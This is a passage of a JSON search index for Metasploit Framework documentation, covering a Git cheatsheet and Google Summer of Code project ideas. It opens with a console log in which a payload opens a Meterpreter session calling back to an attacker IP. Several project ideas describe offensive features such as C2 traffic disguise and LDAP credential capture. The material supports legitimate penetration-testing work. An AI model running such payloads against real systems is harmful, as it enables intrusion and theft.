PowerShell target [*] 10.10.11.5:445 - Executing the payload... [+] 10.10.11.5:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 10.10.11.5 [*] Meterpreter session 1 opened (192.168.123.1:4444 -&amp;gt; 10.10.11.5:60625) at 2023-03-09 12:08:49 +0000 meterpreter &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#scenarios"
  },"135": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Get Ticket granting tickets and service tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html"
  },"136": {
    "doc": "Git cheatsheet",
    "title": "Git Cheatsheet (survival level)",
    "content": "Here is a set of some of the most common things you’ll need to do in your day-to-day workflow with Git. Pro Tip 1: you can get man pages for any git command by inserting a hyphen. As in: “man git-fetch” or “man git-merge” . Pro Tip 2: install the cheat gem for a really long cheat sheet available in your terminal. ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#git-cheatsheet-survival-level",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#git-cheatsheet-survival-level"
  },"137": {
    "doc": "Git cheatsheet",
    "title": "What’s going on?",
    "content": ". | What branch am I on? Which files are modified, which are staged, which are untracked, etc? . git status . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#whats-going-on",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#whats-going-on"
  },"138": {
    "doc": "Git cheatsheet",
    "title": "Fetch, Pull, and Push",
    "content": ". | Get all new changes, and remote branch refs . git fetch . | Do a git fetch and (if possible) a merge on the current branch . git pull . | Push commits to the origin/master (like an SVN commit): . git push origin master . | Push commits on a non-master branch: . git push origin your_branch_name . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#fetch-pull-and-push",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#fetch-pull-and-push"
  },"139": {
    "doc": "Git cheatsheet",
    "title": "Branching",
    "content": ". | See a list of local branches . git branch . | Switch to an existing branch . git checkout existing_branch_name . | Create a new branch and switch to it: . git checkout -b new_branch_name . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#branching",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#branching"
  },"140": {
    "doc": "Git cheatsheet",
    "title": "Merging and Stashing",
    "content": ". | Merge my working branch into current branch: . git merge working_branch_name . | Temporarily clear my stage so I can switch to another branch (“stashing”): . git stash . | Get my stashed stuff back, leaving it in the list of stashes: . git stash apply . | Get my stashed stuff back, removing it from the list: . git stash pop . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#merging-and-stashing",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#merging-and-stashing"
  },"141": {
    "doc": "Git cheatsheet",
    "title": "History, Conflicts, and Fixing Mistakes",
    "content": ". | See the log of commits: . git log . | See what changes were made in a given commit: . git show COMMIT_HASH . | See more detailed log information: . git whatchanged . | Get rid of all the changes I’ve made since last commit: . git reset --hard . | Get rid of the changes for just one file: . git checkout FILENAME . | Make HEAD point to the state of the codebase as of 2 commits ago: . git checkout HEAD^^ . | Fix a conflict (w/ system’s default graphical diff tool): . git mergetool . | Revert a commit (be careful with merges!): . git revert &amp;lt;commit hash&amp;gt; . | Revert a commit from a merge: . git revert -m&amp;lt;number of commits back in the merge to revert&amp;gt; &amp;lt;hash of merge commit&amp;gt; . | . (e.g. git revert -m1 4f76f3bbb83ffe4de74a849ad9f68707e3568e16 will revert the first commit back in the merge performed at 4f76f3bbb83ffe4de74a849ad9f68707e3568e16) . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#history-conflicts-and-fixing-mistakes",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#history-conflicts-and-fixing-mistakes"
  },"142": {
    "doc": "Git cheatsheet",
    "title": "Git in Bash",
    "content": "When using Git, it’s very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you’re currently on. Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt: . function parse_git_branch { git branch --no-color 2&amp;gt; /dev/null | sed -e '/^[^*]/d' -e 's/* \\(.*\\)/(\\1)/' } . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#git-in-bash",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#git-in-bash"
  },"143": {
    "doc": "Git cheatsheet",
    "title": "Git cheatsheet",
    "content": " ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html"
  },"144": {
    "doc": "Git Reference Sites",
    "title": "Learning Git",
    "content": "The following sites are great references for Git padawans and jedi alike: . | Git-SVN crash course: Lots of good stuff on helping newbies grok the concepts of Git w/ reference to similar concepts in Subversion. | Codecademy Git Course: Great free course for quickly getting up to speed on Git with helpful hands on exercises. | Learn Git Branching: Good website for learning how Git branching works in a visual and interactive manner. | Git Reference: From the site: “meant to be a quick reference for learning and remembering the most important and commonly used Git commands.” Follows a tutorial-like format. Great for beginners. | The Pro Git Book: A free, online copy of the Pro Git book by GitHubber Scott Chacon. | The Git Community Book: A free book put together by the Git community for those new to Git. | Git Magic: Another free Git book put together by a Stanford CS student. | Git Ready: A collection of Git tips and tricks. | The Git Parable: A story by GitHub founder Tom Preston-Werner that reveals the underlying principles behind Git’s construction. A great starting point for understanding the nature of Git. | Git is Easier Than You Think: A nice tutorial that breaks down one Git user’s experience switching from Subversion. | PeepCode: Git: A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow. | GitHub Flow: Another great post from Scott Chacon describing a GitHub-based workflow for projects. | Getting Started with GitHub: Also from GitHub’s own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub. | . ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#learning-git",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#learning-git"
  },"145": {
    "doc": "Git Reference Sites",
    "title": "Using Git in Editors",
    "content": ". | Fugitive plugin for Vim: Provides lots of tasty functionality from inside Vim. There’s also a five-part series on VimCasts on using Fugitive for almost any git task you can think of. | TextMate - a bundle for git ships with the editor. Highlight your top-level folder in the project drawer and then invoke with Command-Shift-G . | . ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#using-git-in-editors",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#using-git-in-editors"
  },"146": {
    "doc": "Git Reference Sites",
    "title": "SVN mirroring",
    "content": "Of course, if you’re still having trouble, GitHub does offer basic SVN read-write support. ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#svn-mirroring",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#svn-mirroring"
  },"147": {
    "doc": "Git Reference Sites",
    "title": "Git Reference Sites",
    "content": " ",
    "url": "/docs/development/get-started/git/git-reference-sites.html",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html"
  },"148": {
    "doc": "2017 Mentor Organization Application",
    "title": "2017 Mentor Organization Application",
    "content": "This is how the application was submitted on 2017-02-08. Please make no more edits . – . Please don’t use markdown here, we have to paste it into a form. All answers are limited to 1000 chars. – . Why does your org want to participate in Google Summer of Code? . The story of Metasploit Framework’s creation and development over the last 13 years is one of community collaboration to create and hone tools useful to a wide range of security practitioners. Its broad functionality, combined with the deep domain knowledge of the mentors, offers a unique opportunity for students to learn about security and exploit development. Many of our contributors are established exploit developers and penetration testers who have years of industry experience that they can share with students. We hope that the experience will inspire students to continue contributing to open source security, as well as providing them with invaluable real-world training in development, security, and remote collaboration. How will you keep mentors engaged with their students? . All of our mentors are long-time development team members who have a history of helping new users and contributors. Many of our mentors specialize in certain parts of the framework, so depending on the student’s interests, we will match them with the most complementary mentor. Our project administrators will regularly check in with mentors and students to ensure that the relationship is productive and progressing as expected. How will you help your students stay on schedule to complete their projects? . First, we will ask students to use GitHub’s Projects to track progress in real time as they are working. Mentors will help students divide projects into manageable chunks with measurable milestones. This will help students learn how to manage and break up tasks on large scale projects. Additionally, students and mentors will need to collaborate on a weekly status report that describes their progress and send it to the mailing list. How will you get your students involved in your community during GSoC? . Students will use the same channels that all our contributors use: IRC and GitHub. Students will follow the same procedures of code review that all our contributors follow. By providing them with the same communication channels that our community uses, we hope to encourage the students to interact and collaborate with other contributors and users and to explore additional resources beyond their mentor. Hopefully, this process will give them a network of support and illustrate the advantages of working with other minds. How will you keep students involved with your community after GSoC? . Based on the success of the project, we will encourage students to apply for committer rights at the conclusion of GSoC, include them in Metasploit roadmap discussions, and invite them to special community events. After the conclusion of GSoC we will encourage students to write about their experience on Metasploit’s community blog, which will give their work greater exposure to the overall security community. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-mentor-organization-application.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-mentor-organization-application.html"
  },"149": {
    "doc": "2017 Project Ideas",
    "title": "Console side",
    "content": "Convert between CMD_UNIX and the interpreted language architectures . Perl, Python, and Ruby scripts can all be run via a short command line invocation. It would be nice to be able to use these payloads in ARCH_CMD contexts as well as their own separate architectures (ARCH_PYTHON, ARCH_RUBY). This would allow modules that exploit command injection vulnerabilities to use python meterpreter in particular. Difficulty: 4/5 Requirements: Ruby, Python, bash/sh Mentor: @wvu @sempervictus . Automated exploit reliability scoring . Automatically run a module over and over, determine success rates. Mentor: @busterb . Exploit regression testing . Set up automated testing using something like Vagrant to spin up and configure vulnerable machines, run exploits against them. A categorical focus . Something like “make all X exploits badass”, or add a full suite of modules around particular gear or vendor stack. Requirements: Ruby Mentor: @hdm . Allow post modules to take a payload . As it stands, the framework defines anything that takes a payload to be an exploit. Because post-exploitation modules cannot take a payload, things that want to drop an executable for persistence are implemented as local exploits (in the exploit/*/local namespace instead of post/*/persistence). This project would give those kinds of modules a more consistent interface. Once this is done, we can move the exploit/*/local modules that aren’t actually exploits back to post/ . Difficulty: 3/5 Requirements: Ruby Mentor: @egypt . SMB2 support . (see also ruby_smb project) . Difficulty: 5/5 Mentor: @egypt . Filesystem sessions . The idea here is to create a new session type for authenticated protocols that give you filesystem access. The simplest is FTP, so that’s where we should start. We’ll need several pieces for this to work: . | A new session interface in Msf::Sessions (lib/msf/base/sessions/). This should be abstract enough that we can implement protocols other than FTP in the future. | A mapping of protocol details to that interface. | A new command dispatcher implementing at least these commands: upload, download, ls, cd | We’ll need to modify auxiliary/scanner/ftp/ftp_login to create one of these awesome new sessions when authentication is successful. | . Difficulty: 2/5 Requirements: Ruby . SMB-based file transport for Meterpreter . The idea here is to create a transport that allows Meterpreter and Console to talk via File handles opened via UNC path. In cases where 445 is allowed outbound, Meterpreter can open file handles to a UNC path that MSF is listening on, and they can communicate on those file handles. For this to work we need: . | A new transport that knows how to operate over SMB file handles . | In particular, one file handle is used for writing, and one for reading. | . | New stagers that use the Win32 API to open file handles to a given UNC path. | Most of this is already done in a PR for named pipe transport support, and so a few changes to those stagers should result in it working fine for this. | . | To come up with a method/protocol that both Console and Meterpreter can use to identify when new sessions come in. | . Given that SMB file reading and writing is already a thing, this shouldn’t be too hard on the MSF side. Difficulty: 3/5 Requirements: Ruby &amp;amp; SMB Mentor: @OJ and/or @egypt . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#console-side",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#console-side"
  },"150": {
    "doc": "2017 Project Ideas",
    "title": "Payload side",
    "content": "Malleable HTTP/S C2 for Meterpreter . Currently, the attributes that one can set for how a Meterpreter payload appears at the HTTP level are limited. We would like the ability to set and add arbitrary HTTP headers to requests and responses, so that the traffic appears more realistic. Difficulty: 5/5 Requirements: C, Ruby. Bonus: Python, PHP Mentor: @busterb . Asynchronous victim-side scripting . Using either Python or Powershell (or maybe both if it can be abstract enough). This could allow things like running Responder.py or Empire on a compromised host. Difficulty: 4/5 Requirements: C, Python/Powershell Mentor: @OJ . Use SChannel in native Windows Meterpreter instead of embedded OpenSSL . SChannel is Windows’ built-in TLS library. Difficulty: 3/5 Requirements: C, Windows systems programming Mentor: @OJ . SMB-based file transport for Meterpreter . This is the Meterpreter side of the SMB transport mentioned in the Console section. For this to work we need: . | A new Meterpreter transport that uses file handles to read and write data over SMB to talk to MSF. | Use the named pipe transport PR to see how this might work. | . | Full support of the “protocol” that has been designed so that MSF knows when sessions come in. | . Difficulty: 2/5 Requirements: C, Windows systems programming Mentor: @OJ . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#payload-side",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#payload-side"
  },"151": {
    "doc": "2017 Project Ideas",
    "title": "Metasploitable3",
    "content": "Metasploitable3 is an intentionally vulnerable virtual machine. It was created to be a learning tool for new users as well as a place to test Metasploit and its payloads. Linux: add vulnerabilities . Requirements: Vagrant . Windows: add vulnerabilities . Requirements: Vagrant . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#metasploitable3",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#metasploitable3"
  },"152": {
    "doc": "2017 Project Ideas",
    "title": "Miscellaneous",
    "content": "Replace msftidy with a real linter . Our current module style checker is a mass of regular expressions attempting to look for bad patterns. It could be much improved by using a real lexer. We could use rubocop as a base for this. This could also dovetail into an ongoing documentation project. Difficulty: 2/5 Requirements: Ruby . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#miscellaneous",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#miscellaneous"
  },"153": {
    "doc": "2017 Project Ideas",
    "title": "Potential Mentors",
    "content": "All of the following folks have expressed willingness to be mentors. | @busterb | @egypt | @hdm | @jhart-r7 | @jinq102030 | @mubix | @OJ | @sempervictus | @wvu | @zeroSteiner | . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#potential-mentors",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#potential-mentors"
  },"154": {
    "doc": "2017 Project Ideas",
    "title": "2017 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at GSoC 2017 Student Proposal for how to make a proposal. Submit your own . If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html"
  },"155": {
    "doc": "2017 Student Proposal",
    "title": "Title",
    "content": "A brief description of what you would like to work on. See GSoC-2017-Project-Ideas for ideas. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#title",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#title"
  },"156": {
    "doc": "2017 Student Proposal",
    "title": "Vitals",
    "content": ". | Your name | Contact info - include at least: . | an email address | github user name | Freenode nick | . | . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#vitals",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#vitals"
  },"157": {
    "doc": "2017 Student Proposal",
    "title": "Skillz",
    "content": "What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. What other projects have you worked on before? . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#skillz",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#skillz"
  },"158": {
    "doc": "2017 Student Proposal",
    "title": "Your project",
    "content": "Fill in the details. What exactly do you want to accomplish? . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#your-project",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#your-project"
  },"159": {
    "doc": "2017 Student Proposal",
    "title": "2017 Student Proposal",
    "content": "Send the following to [email protected] . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html"
  },"160": {
    "doc": "2018 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Improving the Post-exploit / Meterpreter functionality . Examples could include: . | Sending keystrokes and mouse movement to a Meterpreter session | HTML based VNC style session control e.g https://github.com/rapid7/metasploit-framework/pull/9196 but accepting user input from the browser | Playing (streaming?) sounds to a Meterpreter session | Implementing the streaming record mechanism from more Meterpreter sessions | Text-to-speech and volume control | Fun behaviors . | Ejecting the CD-ROM drive | Flipping the screen upside down | Changing screen colors | Turning the monitor on/off | Ordering donuts | . | MessageBox or live chat functionality (e.g “This machine is vulnerable to MS17-010, you must run Windows Update!”) | Overlaying an image or even HTML on the user interface | . Difficulty: Varies . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, powershell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploit-framework"
  },"161": {
    "doc": "2018 Project Ideas",
    "title": "Add meta-shell commands",
    "content": "Shell sessions typically expose a direct connection to a remote shell, but are lacking a number of nice features such as the ability to stop a remote command, background a command (this could be advanced or depend on the underlying session), or to even lock the session. This project would implement some pre-processing hooks to shell sessions so that job control could be added by default (allowing backgrounding of commands), meta-commands like ‘background’ and ‘sessions’ could be added as well. Difficulty: 3/5 . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Session-style module interaction . Metasploit has the concept of ‘sessions’ where a connection context can define its own set of console operations. E.g. if you interact with a session, Metasploit switches to a specific subconsole for interaction. It would be nice as an alternative to ‘action’ for auxiliary modules, or as a way to merge related modules, to simply interact with the module. Difficulty: 3/5 . Integration plugin with a 3rd-party post-exploit framework . Connect a 3rd-party post-exploitation framework with Metasploit, such as Empire, Pupy, or Koadic, so that Metasploit can view and interact with sessions outside of its own types. Being able to use outside stagers in exploits, or adding the ability to ‘upgrade’ a session to an outside session type are other possibilities. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#add-meta-shell-commands",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#add-meta-shell-commands"
  },"162": {
    "doc": "2018 Project Ideas",
    "title": "Enhance Metasploitable3",
    "content": "Create a Simulated Active Directory Domain . Expand functionality of the existing Windows 2008 VM to act as a domain controller. The setup should include a number of users of varying roles, multiple group policy objects and settings, and logon scripts or application deployments. Considerations should be taken on how and where to include purposeful vulnerabilities within these settings. Difficulty 2/5 . Configure a Mock Corporate Network . Currently metasploitable3 consists of two separate virtual machines with all currently configured vulnerable services available with a simple network connection. This should be expanded to include a larger number of VMs with services spread across them to better simulate a real world environment. Considerations must be taken for deploying this on systems with varying hardware availability, or look into different cloud providers. Difficulty 4/5 . Add Monitoring Capabilities Between VMs . Metasploitable3 is already a playground from an attacker’s point of view, but how can we make it valuable from a defender’s perspective. Research various network monitoring and detections solutions and implement them across the mock network. Set up a new “NOC” VM for keeping track of activity and watching for intrusion. This goal is to make it fairly simple for anyone to set up a red team vs blue team mock environment. Difficulty 5/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploitable3",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploitable3"
  },"163": {
    "doc": "2018 Project Ideas",
    "title": "Goliath",
    "content": "Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#goliath",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#goliath"
  },"164": {
    "doc": "2018 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#submit-your-own"
  },"165": {
    "doc": "2018 Project Ideas",
    "title": "2018 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. Mentors: @busterb, @zerosteiner, @timwr, @asoto-r7, @jmartin-r7, @pbarry-r7, @mkienow-r7, @jbarnett-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html"
  },"166": {
    "doc": "2019 Project Ideas",
    "title": "2019 Project Ideas",
    "content": "TBD! . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2019-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2019-project-ideas.html"
  },"167": {
    "doc": "2020 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, powershell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Session-style module interaction . Metasploit has the concept of ‘sessions’ where a connection context can define its own set of console operations. E.g. if you interact with a session, Metasploit switches to a specific subconsole for interaction. It would be nice as an alternative to ‘action’ for auxiliary modules, or as a way to merge related modules, to simply interact with the module. Difficulty: 3/5 . Enhance Sql Injection Support . Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI. Difficulty: 3/5 . Conditionally Exposed Options . The Metasploit Framework’s modules offer the core functionality of the project and these each use a set of datastore options for configuration. Many modules specify a particular system that they target or action that they provide. Modules should (but currently lack) the ability to expose and hide options through the UI based on either the target or action that they take. This would allow module developers to create more flexible modules without sacrificing user experience by exposing options that are irrelevant based on the current configuration. Difficulty: 2/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#enhance-metasploit-framework"
  },"168": {
    "doc": "2020 Project Ideas",
    "title": "Goliath",
    "content": "Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#goliath",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#goliath"
  },"169": {
    "doc": "2020 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#submit-your-own"
  },"170": {
    "doc": "2020 Project Ideas",
    "title": "2020 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html"
  },"171": {
    "doc": "2021 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Retain active status of authentication tokens . Many testing techniques interacting with web servers such as XSS rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts. Difficulty: 2/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, powershell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#enhance-metasploit-framework"
  },"172": {
    "doc": "2021 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#submit-your-own"
  },"173": {
    "doc": "2021 Project Ideas",
    "title": "2021 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html"
  },"174": {
    "doc": "2022 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "HTTP-Trace enabled login scanners . Current login scanners are not enabled to support the HTTP-Trace options, this options is current exposed in the Exploit::Remote::HttpClient mixin and not available in login scanners. This functionality would aid module writers in debugging and testing initial module implementations as well as enable end users to provide more verbose details for error reports. Changes to enable this support will need careful validation and testing as a large number of modules would be potentially impacted by the revision. Size: Medium Difficulty: 3/5 . Rest API Pagination . Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a limited set of RCP commands however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs. Size: Large Difficulty: 4/5 . LDAP Capture Capabilities . Metasploit’s LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the 2021 Log4Shell vulnerability. Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are SPNEGO and StartTLS support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients. Size: Medium Difficulty: 3/5 . Enhanced LDAP Query &amp;amp; Collection . When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as Sharphound or by leveraging SMB services via the secrets_dump module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing requests plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. Size: Medium/Large (Depends on proposal) Difficulty: 3/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like 